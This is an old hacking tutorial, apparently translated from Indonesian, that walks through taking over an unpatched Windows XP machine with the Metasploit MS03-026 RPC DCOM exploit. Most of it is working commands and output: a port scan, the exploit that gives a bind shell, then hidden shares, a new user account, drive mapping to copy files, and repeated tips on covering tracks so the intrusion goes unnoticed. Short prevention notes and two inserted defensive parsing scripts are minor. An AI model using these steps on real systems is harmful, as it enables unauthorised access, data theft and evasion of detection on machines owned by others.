Bismillahirrahmaanirrahiim
"4 Commands to take over a Windows machine"
[*] Starting the Metasploit Framework...
+ -- --=[ msfconsole v2.7 [157 exploits - 76 payloads]
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 172.16.0.5
RHOST -> 172.16.0.5
msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Sending request…
[*] Got connection from 172.16.0.3:3766 172.16.0.5:4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Yup, four Metasploit commands are all it takes to exploit a Windows machine
(in a matter of seconds, no less ;p).
That's the short version.
But it's not much fun without going deeper :)
OK, let's go through it one step at a time to make it more interesting..
Read the article below carefully!!
Attention & Notice !!:
=================================
This article is intended purely as information and knowledge for whoever
reads it. So use this information as well as you can, and don't let it be
misused. All consequences of misusing this article are the responsibility
of the person doing so.
The author is not responsible for any misuse of this article.
You are welcome to redistribute this article, with or without the author's
permission, for non-profit purposes, as long as the author is credited.
----===== Introduction =====----
Honestly this article is a bit stale and not very substantial; the author
is aware of this, but there is no harm in sharing it with a few tweaks for
the reader, in the hope that it is useful. Amen...
Note: if you already consider yourself a pro, feel free to leave this
article quickly before it bores you :p, and please write a much better
article than this one!! :)
because i am just an ordinary human :) | Nobody is perfect..
----===== Contents =====----
1. What and how?
This article is about how to get into a Windows machine, a.k.a. take over
Windows (XP or Win2000), using Metasploit with the msrpc_dcom_ms03_026
exploit; afterwards we will play around in the target's cmd once we have
taken over that Wind* machine with the highest privilege (Administrator,
just like root on Linux/*nix ;p).
Open and explore your mind !! :)
2. Tools and peripherals:
attacker: - PC desktop, OS Windows
- computer name fl3xu5
- IP address 172.16.0.3
- metasploit v2.7 (http://metasploit.com)
- a scanner (your choice).
target: - laptop with OS Windows XP SP1 :p
- computer name kidz
- IP address 172.16.0.5
other peripherals
- cross cable, Unshielded Twisted Pair, with RJ45
*yup, this experiment was done peer to peer ;)
while I had a laptop on loan ;p
- soundtrack: Winamp with Dream Theater "Strange Deja Vu" ;p
OK, straight to it so this doesn't take too long :)
3. Start the attack ;p Let's get started !!
3.1. Scanning
OK, as is usual in the hacking process, the first step is scanning:
just use nmap, it's quick and practical :)
G:\> nmap 172.16.0.5
Starting nmap 3.48 ( http://www.insecure.org/nmap/ ) at 2004-03-23 23:00 WIT
Interesting ports on 172.16.0.5:
(The 1652 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
5000/tcp open UPnP
wew, turns out port 135 is open ;p hopefully the RPC service can be
exploited (say a prayer first ;p)
3.2 Exploiting the system via the open port 135.
This time we use metasploit version 2.7, downloadable from its official
site http://metasploit.com. You can also use another exploit such as KAHT2, etc.
[*] Starting the Metasploit Framework...
+ -- --=[ msfconsole v2.7 [157 exploits - 76 payloads]
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 172.16.0.5
RHOST -> 172.16.0.5
msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Sending request…
[*] Got connection from 172.16.0.3:3766 172.16.0.5:4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32> <-- ok, we got into the target's cmd :)
Important points to note:
- target IP: 172.16.0.5
- attacker IP: 172.16.0.3
- ports used for the connection:
port 3766 <-- the attacker's port for the connection to the target
port 4444 <-- the target's port (the win32_bind payload listens there, LPORT 4444)
On the attacker machine (fl3xu5), type: netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP fl3xu5:smtp fl3xu5:0 LISTENING
TCP fl3xu5:finger fl3xu5:0 LISTENING
TCP fl3xu5:http fl3xu5:0 LISTENING
TCP fl3xu5:pop3 fl3xu5:0 LISTENING
TCP fl3xu5:epmap fl3xu5:0 LISTENING
TCP fl3xu5:microsoft-ds fl3xu5:0 LISTENING
TCP fl3xu5:2869 fl3xu5:0 LISTENING
TCP fl3xu5:6017 fl3xu5:0 LISTENING
TCP fl3xu5:1028 fl3xu5:0 LISTENING
TCP fl3xu5:3306 fl3xu5:0 LISTENING
TCP fl3xu5:netbios-ssn fl3xu5:0 LISTENING
TCP fl3xu5:3766 172.16.0.5:4444 ESTABLISHED
UDP fl3xu5:microsoft-ds *:*
UDP fl3xu5:isakmp *:*
UDP fl3xu5:1025 *:*
UDP fl3xu5:1026 *:*
UDP fl3xu5:1049 *:*
UDP fl3xu5:1050 *:*
UDP fl3xu5:1051 *:*
UDP fl3xu5:1052 *:*
UDP fl3xu5:1053 *:*
UDP fl3xu5:1054 *:*
UDP fl3xu5:1055 *:*
UDP fl3xu5:1056 *:*
UDP fl3xu5:4500 *:*
UDP fl3xu5:ntp *:*
UDP fl3xu5:1900 *:*
UDP fl3xu5:ntp *:*
UDP fl3xu5:1027 *:*
UDP fl3xu5:1900 *:*
UDP fl3xu5:4293 *:*
UDP fl3xu5:ntp *:*
UDP fl3xu5:netbios-ns *:*
UDP fl3xu5:netbios-dgm *:*
On the target machine (the target's cmd), type:
C:\WINDOWS\system32>netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP kidz:epmap kidz:0 LISTENING
TCP kidz:microsoft-ds kidz:0 LISTENING
TCP kidz:1025 kidz:0 LISTENING
TCP kidz:1032 kidz:0 LISTENING
TCP kidz:gds_db kidz:0 LISTENING
TCP kidz:4444 kidz:0 LISTENING
TCP kidz:5000 kidz:0 LISTENING
TCP kidz:7551 kidz:0 LISTENING
TCP kidz:netbios-ssn kidz:0 LISTENING
TCP kidz:1370 kidz:0 LISTENING
TCP kidz:1382 kidz:0 LISTENING
TCP kidz:1445 kidz:0 LISTENING
TCP kidz:1454 kidz:0 LISTENING
TCP kidz:1699 kidz:0 LISTENING
TCP kidz:1866 kidz:0 LISTENING
TCP kidz:3859 kidz:0 LISTENING
TCP kidz:4444 172.16.0.3:3766 ESTABLISHED
UDP kidz:epmap *:*
UDP kidz:microsoft-ds *:*
UDP kidz:isakmp *:*
UDP kidz:1026 *:*
UDP kidz:1027 *:*
UDP kidz:1028 *:*
UDP kidz:1581 *:*
UDP kidz:1582 *:*
UDP kidz:1583 *:*
UDP kidz:1584 *:*
UDP kidz:1585 *:*
UDP kidz:1586 *:*
UDP kidz:1587 *:*
UDP kidz:1588 *:*
UDP kidz:1589 *:*
UDP kidz:7550 *:*
UDP kidz:ntp *:*
UDP kidz:1033 *:*
UDP kidz:1900 *:*
UDP kidz:ntp *:*
UDP kidz:netbios-ns *:*
UDP kidz:netbios-dgm *:*
UDP kidz:1900 *:*
Look at the netstat -a output:
Proto = the protocol used
Local Address = the local address of the computer in question (here
kidz) and the port it uses.
Foreign Address = the remote address it is connected to.
State = the connection state.
Now look at the line above,
TCP kidz:4444 172.16.0.3:3766 ESTABLISHED
it means that kidz (the target computer) uses port 4444 to connect to
IP 172.16.0.3 (the attacker's IP) on attacker port 3766, and the state on
both sides is ESTABLISHED (successfully connected ;-)).
This matches the attacker side:
TCP fl3xu5:3766 172.16.0.5:4444 ESTABLISHED

Compare with the target's state before exploitation:
C:\WINDOWS\system32>netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP kidz:epmap kidz:0 LISTENING
TCP kidz:microsoft-ds kidz:0 LISTENING
TCP kidz:1025 kidz:0 LISTENING
TCP kidz:1032 kidz:0 LISTENING
TCP kidz:gds_db kidz:0 LISTENING
TCP kidz:4444 kidz:0 LISTENING
TCP kidz:5000 kidz:0 LISTENING
TCP kidz:7551 kidz:0 LISTENING
TCP kidz:netbios-ssn kidz:0 LISTENING
TCP kidz:1370 kidz:0 LISTENING
TCP kidz:1382 kidz:0 LISTENING
TCP kidz:1445 kidz:0 LISTENING
TCP kidz:1454 kidz:0 LISTENING
TCP kidz:1699 kidz:0 LISTENING
TCP kidz:1866 kidz:0 LISTENING
TCP kidz:3859 kidz:0 LISTENING
UDP kidz:epmap *:*
UDP kidz:microsoft-ds *:*
UDP kidz:isakmp *:*
UDP kidz:1026 *:*
UDP kidz:1027 *:*
UDP kidz:1028 *:*
UDP kidz:1581 *:*
UDP kidz:1582 *:*
UDP kidz:1583 *:*
UDP kidz:1584 *:*
UDP kidz:1585 *:*
UDP kidz:1586 *:*
UDP kidz:1587 *:*
UDP kidz:1588 *:*
UDP kidz:1589 *:*
UDP kidz:7550 *:*
UDP kidz:ntp *:*
UDP kidz:1033 *:*
UDP kidz:1900 *:*
UDP kidz:ntp *:*
UDP kidz:netbios-ns *:*
UDP kidz:netbios-dgm *:*
UDP kidz:1900 *:*
Spot the difference, clear right :)
4. Deeper exploration of the target machine ;p
C:\WINDOWS\system32>cd \
cd \
C:\>dir /a <--- show the directory contents
dir /a
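A defender can turn the before/after netstat comparison above into a check. The following is an added example, not code from the original article: it parses netstat -a rows, diffs a baseline against a later capture and flags ESTABLISHED TCP sessions to peers outside an allow-list; the two captures are constructed from excerpts of the article's listings (host kidz, peer 172.16.0.3).

```python
"""Spot a new inbound connection in `netstat -a` output.

Added example, not part of the original article: it parses the text
format Windows `netstat -a` prints (Proto, Local Address, Foreign Address,
State), diffs a baseline capture against a later one, and flags any
ESTABLISHED TCP session whose peer is not on an allow-list. The two
captures below are constructed from excerpts of the article's listings.
"""
import re
from typing import NamedTuple


class Conn(NamedTuple):
    proto: str
    local_host: str
    local_port: str
    foreign_host: str
    foreign_port: str
    state: str  # empty for UDP rows, which carry no State column


# Proto, local endpoint, foreign endpoint, optional state (UDP rows have none).
ROW_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+(\S+))?\s*$")


def _endpoint(ep):
    """Split 'host:port' on the last colon so 'kidz:4444' and '*:*' both work."""
    host, _, port = ep.rpartition(":")
    return host, port


def parse_netstat(text):
    """Return one Conn per TCP/UDP row; headers and blank lines are skipped."""
    conns = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        proto, local, foreign, state = m.groups()
        lh, lp = _endpoint(local)
        fh, fp = _endpoint(foreign)
        conns.append(Conn(proto, lh, lp, fh, fp, state or ""))
    return conns


def new_entries(baseline, current):
    """Rows present in `current` but absent from `baseline`."""
    seen = set(parse_netstat(baseline))
    return [c for c in parse_netstat(current) if c not in seen]


def suspicious_established(conns, allowed_peers=frozenset()):
    """ESTABLISHED TCP sessions to peers outside the allow-list."""
    return [
        c for c in conns
        if c.proto == "TCP" and c.state == "ESTABLISHED"
        and c.foreign_host not in allowed_peers
    ]


# Constructed baseline: the target before the exploit ran.
BASELINE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    kidz:epmap             kidz:0                 LISTENING
  TCP    kidz:microsoft-ds      kidz:0                 LISTENING
  TCP    kidz:netbios-ssn       kidz:0                 LISTENING
  TCP    kidz:5000              kidz:0                 LISTENING
  UDP    kidz:ntp               *:*
"""

# Constructed capture after the bind shell came up: a new listener on 4444
# and an ESTABLISHED session from the attacker host, as in the article.
AFTER = BASELINE + """\
  TCP    kidz:4444              kidz:0                 LISTENING
  TCP    kidz:4444              172.16.0.3:3766        ESTABLISHED
"""


def report(baseline=BASELINE, current=AFTER):
    """Return the rows that appeared and the subset worth escalating."""
    added = new_entries(baseline, current)
    return added, suspicious_established(added)


if __name__ == "__main__":
    added, flagged = report()
    for c in added:
        print("new:", c)
    for c in flagged:
        print(f"ALERT {c.local_host}:{c.local_port} <- {c.foreign_host}:{c.foreign_port}")
```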
Volume in drive C is systemZ
Volume Serial Number is 634Q-5H3W
Directory of C:\
12/06/2007 01:36 pagi $VAULT$.AVG
03/04/2003 01:57 pagi 0 AUTOEXEC.BAT
06/03/2003 04:55 sore 193 boot.ini
06/02/2003 01:57 sore 0 CONFIG.SYS
22/05/2007 05:52 sore Documents and Settings
26/06/2007 11:20 pagi 255.876.614 hiberfil.sys
18/04/2007 07:27 pagi Inprise
05/02/2003 01:57 sore 0 IO.SYS
09/05/2003 01:57 pagi 0 MSDOS.SYS
27/03/2002 04:08 sore 35.487 NTDETECT.COM
23/05/2002 08:05 sore 343.598 ntldr
28/02/2007 11:20 pagi 453.365.387 pagefile.sys
23/01/2007 03:54 sore 14.243 PDOXUSRS.NET
29/05/2007 12:22 pagi Program Files
23/03/2007 05:55 pagi RECYCLER
04/05/2003 02:02 pagi System Volume Information
22/02/2007 11:39 pagi WINDOWS
10 File(s) 564.767.298 bytes
7 Dir(s) 4.387.087.073 bytes free
now let's see how many OSes are on the target PC ... how?
C:\>type boot.ini
type boot.ini
[boot loader]
timeout=6
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect
well, turns out there is only one OS, Windows...
there's a Program Files directory, let's peek ;p
C:\>cd program files
cd program files
C:\Program Files>dir /a
dir /a
Volume in drive C is systemZ
Volume Serial Number is 634Q-5H3W
Directory of C:\Program Files
23/09/2007 12:22 pagi .
12/09/2007 12:22 pagi ..
21/09/2007 10:57 pagi Adobe
13/09/2007 02:46 sore BORGChat
18/09/2007 07:25 sore Borland
21/09/2007 07:21 sore Common Files
12/01/2003 01:54 pagi ComPlus Applications
13/01/2003 04:11 pagi Grisoft
08/09/2007 10:57 pagi InstallShield Installation Information
15/01/2003 01:56 pagi Internet Explorer
05/09/2007 07:26 sore JavaSoft
14/01/2003 02:38 pagi K-Lite Codec Pack
15/01/2003 01:53 pagi Messenger
04/09/2007 09:51 pagi Microsoft ActiveSync
15/01/2003 01:58 pagi microsoft frontpage
05/09/2007 09:51 pagi Microsoft Office
06/09/2007 09:51 pagi Microsoft.NET
18/09/2007 01:35 sore mIRC
22/01/2003 01:55 pagi Movie Maker
29/01/2003 01:53 pagi MSN
15/01/2003 01:53 pagi MSN Gaming Zone
19/01/2003 01:55 pagi NetMeeting
17/01/2003 01:56 pagi Online Services
15/09/2007 12:14 pagi Opera
13/01/2003 01:55 pagi Outlook Express
18/01/2003 02:03 pagi Uninstall Information
14/09/2007 08:37 sore Winamp
18/09/2007 05:53 sore Windows Media Player
14/01/2003 01:53 pagi Windows NT
04/09/2007 03:14 sore WindowsUpdate
05/09/2007 10:17 pagi WinRAR
06/09/2007 10:20 pagi XemiComputers
13/01/2003 01:58 pagi xerox
05/09/2007 11:45 sore Yahoo!
0 File(s) 0 bytes
34 Dir(s) 5.319.032.098 bytes free
what else? oh yeah, for fun let's create a directory .. but delete it
quickly so we don't get noticed ;) cover the tracks right away :)
C:\>mkdir test
mkdir test
C:\>dir /a
Volume in drive C is systemZ
Volume Serial Number is 634Q-5H3W
Directory of C:\
12/06/2007 01:36 pagi $VAULT$.AVG
03/04/2003 01:57 pagi 0 AUTOEXEC.BAT
06/03/2003 04:55 sore 193 boot.ini
06/02/2003 01:57 sore 0 CONFIG.SYS
22/05/2007 05:52 sore Documents and Settings
26/06/2007 11:20 pagi 255.876.614 hiberfil.sys
18/04/2007 07:27 pagi Inprise
05/02/2003 01:57 sore 0 IO.SYS
09/05/2003 01:57 pagi 0 MSDOS.SYS
27/03/2002 04:08 sore 35.487 NTDETECT.COM
23/05/2002 08:05 sore 343.598 ntldr
28/02/2007 11:20 pagi 453.365.387 pagefile.sys
23/01/2007 03:54 sore 14.243 PDOXUSRS.NET
29/05/2007 12:22 pagi Program Files
23/03/2007 05:55 pagi RECYCLER
04/05/2003 02:02 pagi System Volume Information
24/09/2007 01:07 sore test
22/02/2007 11:39 pagi WINDOWS
10 File(s) 564.767.298 bytes
7 Dir(s) 4.387.087.073 bytes free
nice, the test directory was created ;p .. here:
24/09/2007 01:07 sore test
quick, delete it so the intrusion isn't noticed :p
C:\>rmdir test
rmdir test
C:\>dir /a
dir /a
Volume in drive C is systemZ
Volume Serial Number is 634Q-5H3W
Directory of C:\
12/06/2007 01:36 pagi $VAULT$.AVG
03/04/2003 01:57 pagi 0 AUTOEXEC.BAT
06/03/2003 04:55 sore 193 boot.ini
06/02/2003 01:57 sore 0 CONFIG.SYS
22/05/2007 05:52 sore Documents and Settings
26/06/2007 11:20 pagi 255.876.614 hiberfil.sys
18/04/2007 07:27 pagi Inprise
05/02/2003 01:57 sore 0 IO.SYS
09/05/2003 01:57 pagi 0 MSDOS.SYS
27/03/2002 04:08 sore 35.487 NTDETECT.COM
23/05/2002 08:05 sore 343.598 ntldr
28/02/2007 11:20 pagi 453.365.387 pagefile.sys
23/01/2007 03:54 sore 14.243 PDOXUSRS.NET
29/05/2007 12:22 pagi Program Files
23/03/2007 05:55 pagi RECYCLER
04/05/2003 02:02 pagi System Volume Information
22/02/2007 11:39 pagi WINDOWS
10 File(s) 564.767.298 bytes
7 Dir(s) 4.387.087.073 bytes free
now let's play with networking-related stuff for more fun...
let's see what is shared:
C:\>d:
D:\>net share
net share
Share name Resource Remark
—————————————————————-
IPC$ Remote IPC
D$ D: Default share
F$ F: Default share
ADMIN$ C:\WINDOWS Remote Admin
C$ C: Default share
E$ E: Default share
The command completed successfully.
so the shares are still the defaults.. there are IPC$, D$, F$, ADMIN$,
C$, E$.
Let's explore another directory ...;p
D:\>dir /a
dir /a
Volume in drive D is konami
Volume Serial Number is 2876-28BY
Directory of D:\
14/03/2007 01:38 pagi System Volume Information
18/05/2007 12:23 sore funny
05/09/2007 12:31 sore Recycled
04/03/2007 07:43 sore installerzzz
05/05/2007 12:20 sore Templates
19/01/2007 04:44 sore 23 tutut.txt
05/05/2007 12:11 pagi $VAULT$.AVG
1 File(s) 23 bytes
6 Dir(s) 4.584.785.237 bytes free
oops, there's an installer directory; looks like it holds installers/
software for Windows?? not sure, let's take a look :p
but it's nicer to share it, more fun and challenging ;p
D:\>net share i$=d:/installerzzz
net share i$=d:/installerzzz
i$ was shared successfully.
note: the $ suffix is used so the share is hidden and doesn't show up
when browsing ;p
Let's check whether it was shared...
D:\>net share
net share
Share name Resource Remark
—————————————————————–
IPC$ Remote IPC
D$ D: Default share
i$ d:\installerzzz
F$ F: Default share
ADMIN$ C:\WINDOWS Remote Admin
C$ C: Default share
E$ E: Default share
The command completed successfully.
nice, it's shared with share name i$ ;p
now quickly copy or look through what was shared, so it isn't shared
for too long.. Once done, unshare it right away ;p (once again, we play
clean, be invisible ;p)
so how do you unshare??
D:\>net share i$ /delete
net share i$ /delete
i$ was deleted successfully.
OK it's unshared.. really?? let's check together:
D:\>net share
net share
Share name Resource Remark
——————————————————————–
IPC$ Remote IPC
D$ D: Default share
F$ F: Default share
ADMIN$ C:\WINDOWS Remote Admin
C$ C: Default share
E$ E: Default share
The command completed successfully.
yup, it's unshared...
now let's see which users exist on the target PC..
D:\>net user
net user
User accounts for \
———————————————————————-
Administrator Guest HelpAssistant
kidz SUPPORT_388945a0
The command completed with one or more errors.
so there are quite a few users there; now let's look at the properties
of one of them, e.g. the Administrator user.
D:\>net user Administrator
net user Administrator
User name Administrator
Full Name
Comment Built-in account for administering the computer/domain
User’s comment
Country code 000 (System Default)
Account active Yes <---- the account is active ;p
Account expires Never
Password last set 1/1/2003 8:51 AM
Password expires Never
Password changeable 1/1/2003 8:51 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/20/2007 5:48 PM
Logon hours allowed All
Local Group Memberships *Administrators
D:\>net user tamu 12345 /add
net user tamu tamu /add
The command completed successfully.
which means we added the user tamu with password 12345
D:>net user
net user
User accounts for \
———————————————————————-
Administrator Guest HelpAssistant
kidz SUPPORT_388945a0 tamu
The command completed with one or more errors.
OK, the tamu user was created ;p
Next it's up to you whether to put the tamu user into the administrators
group, then use that account to connect back, and so on.. Go ahead and
develop it yourself ;p
OK, when it's no longer needed let's delete the tamu user so the
intrusion isn't noticed ;p
D:>net user tamu /delete
net user tamu /delete
The command completed successfully.
D:>net user
net user
User accounts for \
———————————————————————-
Administrator Guest HelpAssistant
kidz SUPPORT_388945a0
The command completed with one or more errors.
OK, the tamu user is deleted ;p
Let's explore another drive.. not tired yet, right ;-P hehehe
D:\>f:
F:\>dir /a
dir /a
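The share and user changes made above (the hidden i$ share and the tamu account) are exactly the drift a host audit should catch. This is an added example covering both the net share and the net user passages, not code from the original article: it parses the text output of both commands, flags shares that are not the automatic IPC$/ADMIN$/drive-root ones, and diffs account lists; the sample outputs are constructed from the article's listings, and \\KIDZ is an assumed hostname.

```python
"""Audit `net share` and `net user` output for the changes made above.

Added example, not part of the original article: parses the text that
`net share` and `net user` print, reports shares beyond the automatic
administrative ones (IPC$, ADMIN$ and X$ for a drive root X:\\) and
accounts missing from a baseline. Sample outputs are constructed from
excerpts of the article's listings; \\\\KIDZ is an assumed hostname.
"""
import re

# A resource column that looks like a path: 'C:', 'd:\installerzzz', '\\srv\x'.
PATHLIKE = re.compile(r"^(?:[A-Za-z]:|\\\\)")


def _table_rows(text):
    """Yield the rows between the dashed separator and the status footer."""
    in_table = False
    for line in text.splitlines():
        if line.startswith("---"):
            in_table = True
            continue
        if not in_table or not line.strip() or line.startswith("The command"):
            continue
        yield line


def parse_net_share(text):
    """Return {share_name: resource}; resource is '' when that column is blank."""
    shares = {}
    for row in _table_rows(text):
        parts = row.split()
        resource = parts[1] if len(parts) > 1 and PATHLIKE.match(parts[1]) else ""
        shares[parts[0]] = resource
    return shares


def is_default_share(name, resource):
    """IPC$, ADMIN$, and X$ only when X$ really maps to the X:\\ root.

    Checking the resource, not just the name, means a share called I$ that
    points somewhere other than I:\\ is still reported.
    """
    if name.upper() in ("IPC$", "ADMIN$"):
        return True
    m = re.fullmatch(r"([A-Za-z])\$", name)
    return bool(m) and resource.upper().rstrip("\\") == m.group(1).upper() + ":"


def nondefault_shares(text):
    """Shares an administrator did not get for free, hidden ($) or not."""
    return {n: r for n, r in parse_net_share(text).items()
            if not is_default_share(n, r)}


def parse_net_user(text):
    """Return the set of account names; `net user` prints several per row."""
    return {name for row in _table_rows(text) for name in row.split()}


def new_accounts(baseline, current):
    """Accounts present now that were not in the baseline listing."""
    return parse_net_user(current) - parse_net_user(baseline)


# Constructed from the article's `net share` listing before the i$ share.
SHARES_BEFORE = """\
Share name   Resource                        Remark

-------------------------------------------------------------------------------
IPC$                                         Remote IPC
D$           D:\\                             Default share
ADMIN$       C:\\WINDOWS                      Remote Admin
C$           C:\\                             Default share
The command completed successfully.
"""
# Same listing after `net share i$=d:/installerzzz`, as shown in the article.
SHARES_AFTER = SHARES_BEFORE.replace("ADMIN$", "i$           d:\\installerzzz\nADMIN$", 1)

# Constructed from the article's `net user` listing, before and after `tamu`.
USERS_BEFORE = """\
User accounts for \\\\KIDZ

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
kidz                     SUPPORT_388945a0
The command completed with one or more errors.
"""
USERS_AFTER = USERS_BEFORE.replace("SUPPORT_388945a0", "SUPPORT_388945a0         tamu", 1)


if __name__ == "__main__":
    print("non-default shares:", nondefault_shares(SHARES_AFTER))
    print("new accounts:", new_accounts(USERS_BEFORE, USERS_AFTER))
```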
Volume in drive F is high-Q
Volume Serial Number is 190T-1958
Directory of F:\
19/09/2007 06:39 sore FOUND.000
09/09/2007 01:38 pagi System Volume Information
07/09/2007 12:31 sore Recycled
14/09/2007 07:50 sore film
08/09/2007 07:50 sore SongZ
0 File(s) 0 bytes
5 Dir(s) 5.067.175.298 bytes free
F:\>cd SongZ
cd SongZ
F:\SongZ>dir /a
dir /a
Volume in drive F is high-Q
Volume Serial Number is 190T-1958
Directory of F:\SongZ
16/03/2007 07:50 sore .
11/07/2007 07:50 sore ..
05/02/2003 06:16 pagi Indonesia
07/09/2003 06:18 pagi Barat
19/02/2007 07:51 sore Lirik Lagu
0 File(s) 0 bytes
5 Dir(s) 5.030.287.287 bytes free
Let's share the SongZ folder on f:, then map it on our PC ;p fun, right :)
F:\SongZ>net share b$=f:\SongZ
net share b$=f:\SongZ
b$ was shared successfully
F:\SongZ>net share
net share
Share name Resource Remark
———————————————————————–
IPC$ Remote IPC
D$ D: Default share
b$ f:\SongZ
F$ F: Default share
ADMIN$ C:\WINDOWS Remote Admin
C$ C: Default share
E$ E: Default share
The command completed successfully.
yup, f:\SongZ is now shared under the share name b$.
OK, so all that's left is mapping it on our PC, as if we had a new hard
disk partition. E.g. if we have partitions c,d,e,f,g then usually once
the mapping succeeds a partition Z appears on our PC. For a second mapping
the next mapping point appears, Y. That mapping point is the same as when
we "map network drive" to a folder shared by another PC.
let's just try it ;p
open our own PC:
G:\Documents and Settings\fl3xu5>net use Z: \\172.16.0.5\b$
The command completed successfully.
G:\Documents and Settings\fl3xu5>net use
New connections will not be remembered.
Status Local Remote Network
—————————————————————–
OK Z: \\172.16.0.5\b$ Microsoft Windows Network
The command completed successfully.
OK.. mapped to Z:
Check My Computer and the Z drive will be there, containing the share
\\172.16.0.5\b$
once that works we can copy the shared files from the target PC ;p
this technique makes access easier because we don't need to browse the
target PC; we just click drive Z, which has become the mapping point ;p
*just like accessing a drive on our own PC ;p
When it's no longer needed, "disconnect map drive" right away, so nobody
notices that we shared and mapped files from that target PC. (Remember,
we play clean ;p)
how:
G:\Documents and Settings\fl3xu5>net use Z: /delete
Z: was deleted successfully.
G:\Documents and Settings\fl3xu5>net use
New connections will not be remembered
There are no entries in the list.
Z: is gone, meaning there is no longer a mapping point on our PC..
To be safe, don't forget to unshare b$ on the target PC; how:
F:\SongZ>net share b$ /delete
net share b$ /delete
b$ was deleted successfully
Let's check whether b$ is unshared:
F:\SongZ>net share
net share
Share name Resource Remark
———————————————————–
IPC$ Remote IPC
D$ D: Default share
F$ F: Default share
ADMIN$ C:\WINDOWS Remote Admin
C$ C: Default share
E$ E: Default share
The command completed successfully.
----===== Analysis =====----
In this case the target PC runs Windows with a default installation,
meaning every setting is still the default and the Windows OS has not
been patched. No antivirus or firewall was installed either. Although
antivirus and firewall are not a great way to secure a machine, at least
some of them are suited to preventing this msrpc dcom exploit.
----===== Prevention =====----
One prevention measure is to install AV and a firewall and to apply
patches, which blocks an intruder/attacker coming in via port 135 using
that rpc dcom bug.
The author tried the packet filtering in the TCP/IP properties, as follows:
Choose network connection --> right-click the LAN --> properties -->
TCP/IP --> properties --> advanced --> options --> TCP/IP Filtering -->
properties --> Enable TCP/IP filtering --> click permit only -->
add --> enter port 80 --> ok --> ok --> ok --> ok.
After applying that filter, the author tried the same exploitation via
port 135, and it failed, even without AV or a firewall installed.
However, the filter has many side effects, such as breaking file sharing.
Based on the author's analysis, the exploitation failed because port 135
is closed, and port 135 is used by the service related to file sharing.
Note that a permit-only filter for port 80 also closes 139 and 445
(netbios-ssn and microsoft-ds in the nmap output above), so file sharing
stops along with RPC.
----===== Closing =====----
--->> Additional info
- for more information about metasploit go to http://metasploit.com,
and use ? in the msf console.
- for DOS command info, type help at the command prompt to learn more
about the commands available in Windows (DOS)
- Please analyze netstat more deeply by typing netstat /? in cmd.
Let me give some samples:
G:\Documents and Settings\fl3xu5>net
The syntax of this command is:
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
G:\Documents and Settings\fl3xu5>net localgroup /?
The syntax of this command is:
NET LOCALGROUP
[groupname [/COMMENT:"text"]] [/DOMAIN]
groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN]
groupname name [...] {/ADD | /DELETE} [/DOMAIN]
G:\Documents and Settings\fl3xu5>net share /?
The syntax of this command is:
NET SHARE
sharename
sharename=drive:path [/GRANT:user,[READ | CHANGE | FULL]]
[/USERS:number | /UNLIMITED]
[/REMARK:"text"]
[/CACHE:Manual | Documents| Programs | None ]
sharename [/USERS:number | /UNLIMITED]
[/REMARK:"text"]
[/CACHE:Manual | Documents | Programs | None]
{sharename | devicename | drive:path} /DELETE
G:\Documents and Settings\fl3xu5>net start /?
The syntax of this command is:
NET START
[service]
G:\Documents and Settings\fl3xu5>net stop /?
The syntax of this command is:
NET STOP
service
G:\Documents and Settings\fl3xu5>net use /?
The syntax of this command is:
NET USE
[devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[/USER:[dotted domain name\]username]
[/USER:[username@dotted domain name]
[/SMARTCARD]
[/SAVECRED]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE {devicename | *} [password | *] /HOME
NET USE [/PERSISTENT:{YES | NO}]
G:\Documents and Settings\fl3xu5>net user /?
The syntax of this command is:
NET USER
[username [password | *] [options]] [/DOMAIN]
username {password | *} /ADD [options] [/DOMAIN]
username [/DELETE] [/DOMAIN]
G:\Documents and Settings\fl3xu5>net view /?
The syntax of this command is:
NET VIEW
[\\computername [/CACHE] | /DOMAIN[:domainname]]
NET VIEW /NETWORK:NW [\\computername]
--->> Aware !!
To all, please pay attention to the security side of Windows, including
the rpc dcom bug, and other bugs such as port 139 which can be exploited
with lsass.. etc.
Keep your security info up to date, including bug info and advisories for
the applications you use, and don't forget to patch, etc.
---->> Thanks, Shouts and Greetz To:
- ALLAH SWT and the Prophet Muhammad SAW
- My parents and my family (thank you very much for your love..)
- all of te-28-01 erz ;)
- My 4G'erz at mobilecommlab[dot]or[dot]id (keep your spirits up!!;p)
- newhack|staff, newhack[dot]org
- all members of CnC labz: arz, freak, Cyb3rh3b et al. (missed u guys ;p)
- Student's erZ #students.. oi, don't just chat all the time ;)
- all of the Indonesian Undergroundz Community | staff and memberz
- all of my friends
- at #newhack[dot]org #e-c-h-o, #1stlink, #antihackerlink,
